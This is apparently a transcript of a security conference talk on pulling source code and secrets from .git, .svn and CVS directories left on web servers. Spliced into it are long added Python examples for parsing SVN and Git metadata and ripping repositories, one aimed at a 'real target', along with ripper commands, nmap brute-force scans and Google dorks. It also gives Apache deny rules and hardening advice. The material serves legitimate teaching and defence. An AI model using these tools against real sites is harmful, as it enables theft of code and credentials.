wonderful world of (distributed) scm or vcs
TRANSCRIPT
#BalCCon
Wonderful World of Distributed SCM:Opening closed source code
https://twitter.com/k0st
Vlatko Kosturjak
Agenda
Not covered: philosophical issues
Finding code
Old school SCM
New school SCM
How to get the source when it's not open source
Questions and Answers
75 minutes
Disclaimer
This is a work of pure fiction
Any resemblance to anyone, living or dead is purely coincidental
The characters are fictional and of my own creation
The place, time and incidents are purely fictional
I don't take any responsibility for your actions; consider the ethical and legal issues of what you do!
Look closer - I'm also virtual! :)
That source control management is really really great...
Versioning
Blame
Undo
Collaboration
Code review
Sign off
Integration
...
But...
...Have you thought about security implications?
First rule
If sensitive: don't put source code on the Internet
Don't put SCM files on the internet
Don't put sensitive parts in web root
Don't...
Don't...
Don't...
Search for specific phrase, file, function or class
Just google for it! ;)
Internet does not forget! ;)
Instructions: strings
Google the above
@alexsotirov on 4th of July 2010: "It's amazing what you can find on random Chinese sites if you start googling internal strings from closed-source applications"
How about configs in repos?
Software.conf vs Software.conf-dist
Software.conf: more dangerous
Danger of accidentally committing sensitive info
Software.conf-dist: less dangerous
Still, watch out for wildcards (*)
Search?
Functions: odbc_connect
mysql_connect
Search engines: Google
GitHub
...
Old School
versioning systems
RCS
CVS
Subversion (SVN)
...
CVS
Concurrent Versions System
CVS directory contents: Entries
Entries.Log
Repository
Root
Finding the repository source: profit if it is Internet accessible
What can be extracted?
Artifacts: repository location
Names of hidden files (if present in the repository)
Repository user
Just enough for password guessing if the CVS server is online
DVCS-ripper
Example: rip-cvs.pl -v -u http://www.example.com
Nmap: nmap -p 2401 --script=cvs-brute www.example.com
Profit!
Protection
Make it open source ;)
Remove SCM files if not needed
Web server configuration
Web deployment automation controls
...
SVN
Subversion
.svn directory contents: prop-base
props
text-base
tmp
entries
Finding the repository source: profit if it is Internet accessible
Sensitive files
Extraction of whole tree possible
Example .svn/entries content (directory entry: kind, revision, URL, repository root, author):
dir/
0
svn://myprivatecode.com//repo/myweb
svn://myprivatecode.com//repo/myweb
user
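The entries file above is plain text, so a ripper does not need the SVN client at all. As an added example (not code from the talk or from DVCS-ripper), the parser below reads a pre-1.7 `.svn/entries` file and pulls out exactly the artifacts the slides list: repository URL and root, committers, the files in the directory with the `text-base/<name>.svn-base` path where their pristine copy sits, and the subdirectories that have their own `.svn/entries` to fetch next. It assumes the format-10 layout (format-number line, entries separated by form feed + newline, newline-terminated fields in the order name, kind, revision, url, repos, schedule, text-time, checksum, committed-date, committed-rev, last-author; later fields are ignored). The sample file is constructed with `make_entry`.

```python
"""Parse a Subversion 1.6 (and earlier) `.svn/entries` file and list what it gives away.

Added example, not code from the talk or from DVCS-ripper. Assumes the format-10 layout
described in the lead-in; the sample below is constructed, not taken from a real site.
"""
FIELDS = ["name", "kind", "revision", "url", "repos", "schedule", "text_time",
          "checksum", "committed_date", "committed_rev", "last_author"]


def make_entry(**values):
    """One entry: every field in FIELDS order, newline-terminated, empty where unset."""
    return "".join(values.get(f, "") + "\n" for f in FIELDS)


# Constructed sample: the directory's own entry (empty name) carries url/repos; file
# entries inherit them and leave those fields blank, as real 1.6 working copies do.
SAMPLE_ENTRIES = "10\n" + "\x0c\n".join([
    make_entry(kind="dir", revision="117", url="svn://myprivatecode.com/repo/myweb",
               repos="svn://myprivatecode.com/repo",
               committed_date="2012-03-04T10:20:30.000000Z", committed_rev="117",
               last_author="alice"),
    make_entry(name="index.php", kind="file", text_time="2012-03-04T10:25:00.000000Z",
               checksum="d41d8cd98f00b204e9800998ecf8427e",
               committed_date="2012-03-04T10:20:30.000000Z", committed_rev="117",
               last_author="alice"),
    make_entry(name="config.php", kind="file", text_time="2012-03-01T08:00:00.000000Z",
               checksum="9e107d9d372bb6826bd81d3542a419d6",
               committed_date="2012-03-01T08:00:00.000000Z", committed_rev="113",
               last_author="bob"),
    make_entry(name="inc", kind="dir"),
])


def parse_entries(text):
    """Return one dict per entry; raises on a format this parser does not understand."""
    first, _, rest = text.partition("\n")
    if first.strip() != "10":
        raise ValueError("entries format %r not handled (expected 10)" % first)
    entries = []
    for chunk in rest.split("\x0c\n"):
        fields = chunk.split("\n")
        fields += [""] * (len(FIELDS) - len(fields))   # pad short (truncated) entries
        entries.append(dict(zip(FIELDS, fields)))       # zip drops fields we ignore
    return entries


def summarize(entries):
    """What one directory exposes: repo URL/root, revision, committers, files with the
    relative path of their pristine copy (text-base/<name>.svn-base), and subdirectories."""
    this_dir = next(e for e in entries if e["name"] == "" and e["kind"] == "dir")
    files, subdirs = [], []
    for e in entries:
        if e is this_dir:
            continue
        if e["kind"] == "dir":
            subdirs.append(e["name"])        # each has its own .svn/entries to fetch
        else:
            url = e["url"] or this_dir["url"] + "/" + e["name"]   # files inherit the dir URL
            files.append((e["name"], url, "text-base/%s.svn-base" % e["name"]))
    authors = sorted({e["last_author"] for e in entries if e["last_author"]})
    return {"url": this_dir["url"], "repos": this_dir["repos"],
            "revision": this_dir["revision"], "authors": authors,
            "files": files, "subdirs": subdirs}
```

On a real target you would fetch `/.svn/entries`, feed it to `parse_entries`, download each `text-base/<name>.svn-base` from the same `.svn/` directory, and recurse into every subdirectory's `.svn/entries`; the committer names are the "repository user" artifact from the CVS slide, useful for password guessing if the server itself is reachable.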
SVN client 1.7+ (new working copy format)
No more .svn directories all around: a single .svn at the working copy root (just like git!)
Different format: incompatible, of course ;)
Different files: wc.db SQLite database plus pristine/ copies named by SHA-1
SVN 1.7+ extraction
Much easier
Much faster
Much more robust: no more problems extracting interpreted files like PHP (pristine copies are named by hash, without the .php extension, so the web server does not execute them)
Thank you SVN developers! ;)
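Why the 1.7+ layout is "much easier" is best seen in code. As an added example (not the talk's tool or any tool it names), the snippet below opens a `wc.db`, reads the repository root and committers, and maps every committed file to its pristine copy under `.svn/pristine/`. It assumes only the REPOSITORY and NODES columns it queries (the real schema has many more) and that a pristine copy lives at `.svn/pristine/<first two hex>/<sha1 hex>.svn-base` with the checksum stored as `$sha1$<hex>`. The database is constructed in memory; with a ripped `.svn/` directory you would `sqlite3.connect("wc.db")` instead, and no access to the repository server is needed.

```python
"""Read a Subversion 1.7+ `.svn/wc.db` and map tracked files to their pristine copies.

Added example, not code from the talk or from dvcs-ripper. Schema is a constructed subset
of the real wc.db (only the columns queried below); rows are constructed sample data.
"""
import sqlite3

SAMPLE_SCHEMA = """
CREATE TABLE REPOSITORY (id INTEGER PRIMARY KEY, root TEXT, uuid TEXT);
CREATE TABLE NODES (
    wc_id INTEGER, local_relpath TEXT, op_depth INTEGER, parent_relpath TEXT,
    repos_id INTEGER, repos_path TEXT, revision INTEGER, presence TEXT,
    kind TEXT, checksum TEXT, changed_author TEXT
);
"""

# Constructed rows: (local_relpath, op_depth, parent_relpath, repos_path, revision,
# presence, kind, checksum, changed_author). op_depth 0 is the BASE (committed) tree.
SAMPLE_ROWS = [
    ("", 0, None, "trunk", 42, "normal", "dir", None, "alice"),
    ("index.php", 0, "", "trunk/index.php", 42, "normal", "file",
     "$sha1$" + "ab" * 20, "alice"),
    ("inc", 0, "", "trunk/inc", 42, "normal", "dir", None, "alice"),
    ("inc/config.php", 0, "inc", "trunk/inc/config.php", 41, "normal", "file",
     "$sha1$" + "cd" * 20, "bob"),
    ("old.txt", 0, "", "trunk/old.txt", 40, "not-present", "file", None, "bob"),  # gone upstream
]


def build_sample_wcdb():
    """In-memory stand-in for a ripped .svn/wc.db."""
    db = sqlite3.connect(":memory:")
    db.executescript(SAMPLE_SCHEMA)
    db.execute("INSERT INTO REPOSITORY VALUES (1, 'svn://myprivatecode.com/repo', 'constructed-uuid')")
    db.executemany("INSERT INTO NODES VALUES (1, ?, ?, ?, 1, ?, ?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return db


def pristine_relpath(checksum):
    """'$sha1$<40 hex>' -> 'pristine/<first two hex>/<40 hex>.svn-base' (relative to .svn/)."""
    prefix = "$sha1$"
    if not checksum or not checksum.startswith(prefix):
        raise ValueError("unexpected checksum format: %r" % (checksum,))
    digest = checksum[len(prefix):]
    if len(digest) != 40 or any(c not in "0123456789abcdef" for c in digest):
        raise ValueError("not a SHA-1 hex digest: %r" % digest)
    return "pristine/%s/%s.svn-base" % (digest[:2], digest)


def repository_roots(db):
    """The 'repository location' artifact."""
    return [row[0] for row in db.execute("SELECT root FROM REPOSITORY ORDER BY id")]


def committers(db):
    """The 'repository user' artifact: everyone who last changed a node."""
    rows = db.execute("SELECT DISTINCT changed_author FROM NODES "
                      "WHERE changed_author IS NOT NULL ORDER BY changed_author")
    return [row[0] for row in rows]


def tracked_files(db):
    """[(working-copy path, pristine path)] for every committed, present file."""
    rows = db.execute("SELECT local_relpath, checksum FROM NODES "
                      "WHERE kind = 'file' AND presence = 'normal' AND op_depth = 0 "
                      "ORDER BY local_relpath")
    return [(path, pristine_relpath(checksum)) for path, checksum in rows]
```

Compare this with the 1.6 procedure: one SQLite query replaces walking every directory's `entries` file, and the pristine files are fetched by hash, so nothing depends on the web server treating `.php.svn-base` sensibly.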
Protection
Make it open source ;)
Remove SCM files if not needed
Web server configuration
Web deployment automation controls
...
Apache (main configuration file)
403 Forbidden (move along, nothing to see):
    <DirectoryMatch "\.svn">
        Order allow,deny
        Deny from all
    </DirectoryMatch>
    (Apache 2.4: Require all denied)
404 Not found (pick somewhere else):
    AliasMatch \.svn /non-existant-page
Apache (.htaccess)
Using mod_rewrite:
    RewriteEngine On
    RewriteRule \.svn /non-existant-404-page [L]
    (in .htaccess the pattern is matched against the path relative to the directory, so it must not start with /)
IndexIgnore .svn (hides it from directory listings only; it does not block requests for the files)
New School(distributed)
source code management systems
Git
Mercurial
Bazaar
...
Git!?
Google Dorks
Want source?
Get the repo:
    mkdir git-test
    cd git-test
    wget --mirror --include-directories=/.git http://www.target.com/.git
Get files:
    cd www.target.com
    git reset --hard
Profit!
http://www.skullsecurity.org/blog/2012/using-git-clone-to-get-pwn3d
Problem
Directory browsing disabled
Git: many ways...
Find archive of SCM
Bruteforce SHA1: bandwidth
Time
Partial SHA1s visible in different files
There must be the way...
Zombie mode on
I MUST GET THE SOURCE... I MUST GET THE SOURCE... I MUST GET THE SOURCE...
DVCS-Pillage
It will rip the .git files when directory browsing is disabled (by Adam Baldwin)
Accessible from URL: https://github.com/evilpacket/DVCS-Pillage
Has a few problems... Hmm...
Problems...
Current methods: not a complete tree download method
Packed refs
git ls-files stage method
No support for branches
No support for anything other than HTTP
Slooow...
Hmmm... want the whole tree / all files
Branches
Support old protocols
Bruteforcing not feasible
Zombie mode on
I MUST GET THE FULL SOURCE... I MUST GET THE FULL SOURCE... I MUST GET THE FULL SOURCE...
Back to the drawing board!
RTFM
Solution is...
RTFM: git fsck will tell which SHA1s are missing
No partial recovery
Time to code my own tool: want the whole tree
Branches
Support all protocols
FAST!!
DVCS-rip
It will rip the .git files when directory browsing is disabled
It will rip ALL files and check out the repository for you (not partial)
git fsck trick
Support for: branches
Any protocol (http/https/...)
Accessible from URL:https://github.com/kost/dvcs-ripper
DVCS-rip
How to run?
Example run: rip-git.pl -v -u http://www.example.com/.git/
It will automatically do "git checkout -f"
Profit!
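The "git fsck trick" is worth seeing as code. As an added example (not dvcs-ripper itself, but the same idea in miniature), the program below starts at `HEAD`, fetches each object, reads which objects it references (exactly what `git fsck` would report as missing if they were absent), fetches those, and repeats until nothing is missing, then rebuilds the files the way `git checkout -f` would. The "web root" is a constructed in-memory dict and `fetch` stands in for an HTTP GET, so it runs offline; it verifies every object against its SHA-1 (a server that answers with an HTML error page instead of the object is caught), and it refuses to produce a partial checkout when an object is not served. Only loose objects are handled; real repositories also use packfiles and packed-refs, which is the gap the slides above complain about.

```python
"""Recover a repository from an exposed `.git/` by walking the object graph from HEAD.

Added example, not the talk's dvcs-ripper. The web root is constructed in memory and
`fetch` stands in for HTTP GET; only loose objects (no packfiles) are handled.
"""
import hashlib
import zlib

SECRET_CONFIG = b"<?php $db_pass = 'hunter2'; // constructed sample secret\n"


def loose_object(kind, payload):
    """(sha1 hex, zlib-compressed bytes) for a git object, exactly as git stores it."""
    raw = kind.encode() + b" " + str(len(payload)).encode() + b"\x00" + payload
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)


def tree_payload(entries):
    """entries: (mode, name, sha hex) -> tree body of '<mode> <name>\\0<20-byte sha>' records."""
    return b"".join(mode.encode() + b" " + name.encode() + b"\x00" + bytes.fromhex(sha)
                    for mode, name, sha in sorted(entries, key=lambda e: e[1]))


def build_sample_webroot():
    """Constructed `.git/` of a tiny PHP site with a committed credential."""
    web = {}

    def put(kind, payload):
        sha, data = loose_object(kind, payload)
        web[".git/objects/%s/%s" % (sha[:2], sha[2:])] = data
        return sha

    cfg = put("blob", SECRET_CONFIG)
    idx = put("blob", b"<?php require 'inc/config.php';\n")
    inc = put("tree", tree_payload([("100644", "config.php", cfg)]))
    root = put("tree", tree_payload([("100644", "index.php", idx), ("40000", "inc", inc)]))
    commit = put("commit", b"tree " + root.encode() + b"\n"
                 b"author Alice <alice@example.com> 1370000000 +0200\n"
                 b"committer Alice <alice@example.com> 1370000000 +0200\n\nadd config\n")
    web[".git/HEAD"] = b"ref: refs/heads/master\n"
    web[".git/refs/heads/master"] = commit.encode() + b"\n"
    return web


def parse_object(sha, compressed):
    """Decompress a loose object, verify it hashes to `sha`, return (kind, body)."""
    raw = zlib.decompress(compressed)
    if hashlib.sha1(raw).hexdigest() != sha:
        raise ValueError("object %s is corrupt or was served as something else" % sha)
    header, _, body = raw.partition(b"\x00")
    kind, size = header.split(b" ")
    if int(size) != len(body):
        raise ValueError("size mismatch in object %s" % sha)
    return kind.decode(), body


def tree_entries(body):
    """Yield (mode, name, sha hex) from a tree body."""
    i = 0
    while i < len(body):
        sp = body.index(b" ", i)
        nul = body.index(b"\x00", sp)
        yield body[i:sp].decode(), body[sp + 1:nul].decode(), body[nul + 1:nul + 21].hex()
        i = nul + 21


def references(kind, body):
    """Objects this object points at: tree and parents of a commit, children of a tree."""
    if kind == "commit":
        refs = []
        for line in body.split(b"\n"):
            if not line:               # blank line ends the headers
                break
            key, _, value = line.partition(b" ")
            if key in (b"tree", b"parent"):
                refs.append(value.decode())
        return refs
    if kind == "tree":
        return [sha for _, _, sha in tree_entries(body)]
    return []                          # blobs reference nothing


def rip(fetch):
    """fetch(path) -> bytes or None. Returns (HEAD commit sha, {sha: (kind, body)})."""
    head = fetch(".git/HEAD").decode().strip()
    start = fetch(".git/" + head[5:]).decode().strip() if head.startswith("ref: ") else head
    objects, missing = {}, [start]
    while missing:                     # the fsck loop: keep fetching until nothing is missing
        sha = missing.pop()
        if sha in objects:
            continue
        data = fetch(".git/objects/%s/%s" % (sha[:2], sha[2:]))
        if data is None:
            raise LookupError("object %s not served; a checkout would be partial" % sha)
        objects[sha] = parse_object(sha, data)
        missing.extend(references(*objects[sha]))
    return start, objects


def checkout(objects, tree_sha, prefix=""):
    """Flatten a tree into {path: bytes}, what `git checkout -f` would write to disk."""
    files = {}
    for mode, name, sha in tree_entries(objects[tree_sha][1]):
        if mode == "40000":
            files.update(checkout(objects, sha, prefix + name + "/"))
        else:
            files[prefix + name] = objects[sha][1]
    return files


def rip_and_checkout(webroot):
    """End to end: HEAD -> commit -> root tree -> every file."""
    head, objects = rip(webroot.get)
    return checkout(objects, references(*objects[head])[0])
```

To go from this to branches, replace the single `HEAD` start with every ref under `.git/refs/heads/` (and `.git/packed-refs`, which this example does not parse) and seed `missing` with all of them; the loop is unchanged.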
Protection
Make it open source ;)
Remove SCM files if not needed
Web server configuration
Web deployment automation controls
...
Apache (main configuration file)
403 Forbidden (move along, nothing to see):
    <DirectoryMatch "\.git">
        Order allow,deny
        Deny from all
    </DirectoryMatch>
    (Apache 2.4: Require all denied)
404 Not found (pick somewhere else):
    AliasMatch \.git /non-existant-page
Apache (.htaccess)
Using mod_rewrite:
    RewriteEngine On
    RewriteRule \.git /non-existant-404-page [L]
    (in .htaccess the pattern is matched against the path relative to the directory, so it must not start with /)
IndexIgnore .git (hides it from directory listings only; it does not block requests for the files)
How about others?
Mercurial
Bazaar
Check out DVCS-Pillage: it will handle git, hg and bzr
Accessible from URL: https://github.com/evilpacket/DVCS-Pillage
No tool available to detect
Most web/network scanners will not find this: no awareness
Tools only look at this: .git/ => 403
They should actually look at: .git/logs/HEAD => 200
.git/config => 200
.git/index => 200
...
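A 200 on `.git/index` is also the cheapest way to learn what the repository contains before ripping anything (this is the `git ls-files` stage method mentioned earlier): the index lists every tracked path with its blob SHA-1 and size. As an added example (not from the talk, DVCS-Pillage or nmap's http-git), the parser below reads a version-2 index as the format is understood from git's documentation: a 12-byte header (`DIRC`, version, entry count), per entry a fixed 62-byte header followed by the NUL-terminated path padded to a multiple of 8 bytes, and a SHA-1 trailer over everything before it. Checking the magic and the trailer is what separates a real index from a 200 that is really a soft-404 page, which is the content check a scanner should do instead of trusting status codes. The sample index is constructed with `build_index`.

```python
"""List the files an exposed `.git/index` tracks, without fetching a single object.

Added example, not code from the talk or its tools. Handles index version 2 only;
`build_index` constructs the sample (timestamps and inode data zeroed).
"""
import hashlib
import struct

HEADER = struct.Struct(">4sLL")          # magic, version, entry count
ENTRY_FIXED = struct.Struct(">10L20sH")  # ctime/mtime (s,ns), dev, ino, mode, uid, gid, size, sha, flags


def _padded_len(name_len):
    """Entry length including the 1-8 NUL bytes that pad it to a multiple of 8."""
    length = ENTRY_FIXED.size + name_len
    return length + (8 - length % 8)


def build_index(entries):
    """entries: [(path, mode, sha hex, size)] -> bytes of a v2 index in git's own layout."""
    out = HEADER.pack(b"DIRC", 2, len(entries))
    for path, mode, sha, size in sorted(entries):
        name = path.encode()
        if len(name) >= 0xFFF:
            raise ValueError("path too long for this writer")
        fixed = ENTRY_FIXED.pack(0, 0, 0, 0, 0, 0, mode, 0, 0, size, bytes.fromhex(sha), len(name))
        out += (fixed + name).ljust(_padded_len(len(name)), b"\x00")
    return out + hashlib.sha1(out).digest()   # trailer: SHA-1 of everything before it


def parse_index(data):
    """Return [(path, mode, sha hex, size)] or raise if `data` is not a sane v2 index."""
    if len(data) < HEADER.size + 20:
        raise ValueError("too short to be an index")
    if hashlib.sha1(data[:-20]).digest() != data[-20:]:
        raise ValueError("trailer checksum mismatch: truncated download or not an index")
    magic, version, count = HEADER.unpack_from(data, 0)
    if magic != b"DIRC":
        raise ValueError("bad magic %r" % magic)
    if version != 2:
        raise ValueError("only index version 2 handled here, got %d" % version)
    entries, off = [], HEADER.size
    for _ in range(count):
        fields = ENTRY_FIXED.unpack_from(data, off)
        mode, size, sha, flags = fields[6], fields[9], fields[10], fields[11]
        name_len = flags & 0x0FFF
        start = off + ENTRY_FIXED.size
        if name_len == 0x0FFF:                 # long name: length field saturated, read to NUL
            name_len = data.index(b"\x00", start) - start
        entries.append((data[start:start + name_len].decode(), mode, sha.hex(), size))
        off += _padded_len(name_len)
    return entries


def looks_like_git_index(data):
    """Cheap content check a scanner can apply to whatever came back for .git/index."""
    return data[:4] == b"DIRC"


# Constructed sample: what a small PHP site's index might list.
SAMPLE_INDEX = build_index([
    ("index.php", 0o100644, "aa" * 20, 123),
    ("inc/config.php", 0o100644, "bb" * 20, 456),   # the file you would fetch first
    ("deploy.sh", 0o100755, "cc" * 20, 78),
])
```

With the list in hand, each blob is one request to `.git/objects/<sha[:2]>/<sha[2:]>`; the parse also tells you which SHA-1s to expect, so no brute-forcing is involved.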
Nmap NSE comes to rescue
Have to use the latest Nmap version: the script is not in 6.01
It was broken in some previous Nmap versions
It checks all relevant git files: .git/logs/HEAD
.git/config
...
    nmap -sS -PS80,81,443,8080,8081 -p80,81,443,8080,8081 --script=http-git
    PORT   STATE SERVICE
    80/tcp open  http
    | http-git:
    |   Potential Git repository found at XX.XX.XX.XX:XX/.git/ (found 5 of 6 expected files)
Evolving
Good example of open source collaboration between projects
WiK and Mubix: gitDigger (Defcon 21 / Bsides Vegas)
https://github.com/wick2o/gitDigger
Google dorks
intitle:"index of" ".git"
intitle:"index of" ".svn"
intitle:"index of" "CVS"
intitle:"index of" ".hg"
intitle:"index of" ".bzr"
(I guess you got idea already)...
Searching for standard interfaces
Interfaces: Redmine
ViewVC
ViewCVS
Gitweb
...
Google dorks: "Powered by ViewVC"
Bing as well...
Recommendations for developers
Do not store passwords and API keys in SCM: config.php vs config.php-dist
Do not store sensitive info in SCM
Separate test and production data
Being paranoid is a good feeling
Recommendations for system administrators
Proactively forbid serving all SCM files on web servers
Periodically check for the standard directories of SCMs, i.e.:
find /web -name .svn
find /web -name .git
wget http://www.site.com/svn/
Is there any need to have source code available at all?
Recommendations for management and auditors
Ask how source code management is done
Ask what security controls are there to protect source code:
What controls are there to prevent source code leaks?
What controls are there to prevent password and key leaks?
What controls are there to protect sensitive information in source code and configurations?
References
https://github.com/evilpacket/DVCS-Pillage
https://github.com/kost/DVCS-Pillage
https://github.com/kost/dvcs-ripper
https://github.com/anantshri/svn-extractor
http://blog.anantshri.info/svn-extractor-for-web-pentesters/
http://www.adamgotterer.com/post/28125474053/hacking-the-svn-directory-archive
http://www.cirt.net/svnpristine
http://pen-testing.sans.org/blog/2012/12/06/all-your-svn-are-belong-to-us/comment-page-1/
http://nmap.org/nsedoc/scripts/cvs-brute-repository.html
http://nmap.org/nsedoc/scripts/cvs-brute.html
http://nmap.org/nsedoc/scripts/http-git.html
Questions? Comments? Feedback?
@k0st
This is zero
Acknowledgements: Adam Baldwin, Ron Bowes, Alex Weber, ...